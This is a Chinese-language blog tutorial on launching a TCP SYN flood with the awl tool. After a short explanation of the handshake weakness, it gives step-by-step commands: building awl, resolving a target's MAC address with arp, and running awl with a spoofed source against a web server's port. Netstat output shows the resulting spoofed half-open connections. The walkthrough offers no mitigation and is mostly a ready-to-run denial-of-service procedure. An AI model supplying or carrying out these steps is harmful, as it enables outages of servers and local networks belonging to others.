利用tcp三次握手,使用awl伪装MAC地址进行多线程SYN洪水攻击

2023-08-27 17:39:10

SYN洪水攻击概述:
SYN洪水攻击主要源于: tcp协议的三次握手机制
tcp协议面向链接的协议
SYN洪水攻击的过程:
在服务端返回一个确认的SYN-ACK包的时候有个潜在的弊端,如果发起的客户是一个不存在的客户端,那么服务端就不会接到客户端回应的ACK包
这时服务端需要耗费一定的数量的系统内存来等待这个未决的连接,直到等待超关闭时间,才能施放内存
如果恶意者通过通过ip欺骗,发送大量SYN包给受害者系统,导致服务端存在大量未决的连接并占用大量内存和tcp连接,从而导致正常客户端无法访问服务端,这就是SYN洪水攻击的过程

在客户机上安装awl软件进行攻击
下载地址:
https://gitlab.com/davical-project/awl/tags
上传到linux系统中
开始安装awl

[root@DaMoWang ~]# tar xf awl-0.2.tar.gz -C /usr/src/

[root@DaMoWang ~]# cd /usr/src/awl-0.2/

[root@DaMoWang awl-0.2]# ./configure && make -j  && make install

[root@DaMoWang awl-0.2]# which awl

/usr/local/bin/awl

awl伪装MAC地址进行多线程SYN攻击 > 获取对方的IP地址解析成MAC地址

[root@DaMoWang ~]# arp -n

Address                  HWtype  HWaddress           Flags Mask            Iface

192.168.94.1             ether   :::c0::   C                     ens33

192.168.94.2             ether   :::f9:bc:   C                     ens33

[root@DaMoWang ~]# ping 192.168.94.29

[root@DaMoWang ~]# arp -n

Address                  HWtype  HWaddress           Flags Mask            Iface

192.168.94.29            ether   :0c::7d:b5:   C                     ens33

192.168.94.1             ether   :::c0::   C                     ens33

192.168.94.2             ether   :::f9:bc:   C                     ens33

awl参数如下:
-i 发送包的接口
-m 指定目标mac地址 注:如果-m没有指定mac,默认目标MAC地址是“FF.FF.FF.FF.FF.FF”,
这表示向同一网段内的所有主机发出ARP广播,进行SYN攻击,还容易使整个局域网瘫痪
-d 被攻击机器的IP
-p 被攻击机器的端口

# 查看被攻击前的wab服务器80端口

[root@server ~]# netstat -antup|grep :

tcp6              :::                   :::*                    LISTEN      /httpd

开始攻击:

# 测试攻击三秒

[root@DaMoWang ~]# awl -i ens33 -m :0c::7d:b5: -d 192.168.94.29 -p

 #攻击效果:
 #在server上查看:发现很多伪装成公网的IP在攻击我们

[root@server ~]# netstat -antup|grep :

tcp               192.168.94.29:        252.60.102.53:      SYN_RECV    -

tcp               192.168.94.29:        250.167.218.42:    SYN_RECV    -

tcp               192.168.94.29:        245.241.14.61:     SYN_RECV    -

tcp               192.168.94.29:        246.144.13.20:     SYN_RECV    -

tcp               192.168.94.29:        250.221.131.26:    SYN_RECV    -

tcp               192.168.94.29:        245.222.184.94:    SYN_RECV    -

tcp               192.168.94.29:        241.98.121.43:     SYN_RECV    -

tcp               192.168.94.29:        250.5.25.10:       SYN_RECV    -

tcp               192.168.94.29:        247.23.128.105:    SYN_RECV    -

tcp               192.168.94.29:        251.126.27.89:     SYN_RECV    -

tcp               192.168.94.29:        241.51.26.67:       SYN_RECV    -

tcp               192.168.94.29:        255.103.18.1:      SYN_RECV    -

tcp               192.168.94.29:        254.239.94.37:      SYN_RECV    -

tcp               192.168.94.29:        243.180.7.100:     SYN_RECV    -

tcp               192.168.94.29:        253.170.6.21:      SYN_RECV    -

tcp               192.168.94.29:        247.92.108.56:     SYN_RECV    -

tcp               192.168.94.29:        248.187.73.6:      SYN_RECV    -

[root@server ~]# netstat -antup|grep :80 |wc -l
  121

 #三秒钟 一百多次攻击

上一篇:Easy machine learning pipelines with pipelearner: intro and call for contributors


下一篇:超越村后端开发(3:安装djangorestframework+序列化+API开发前期准备)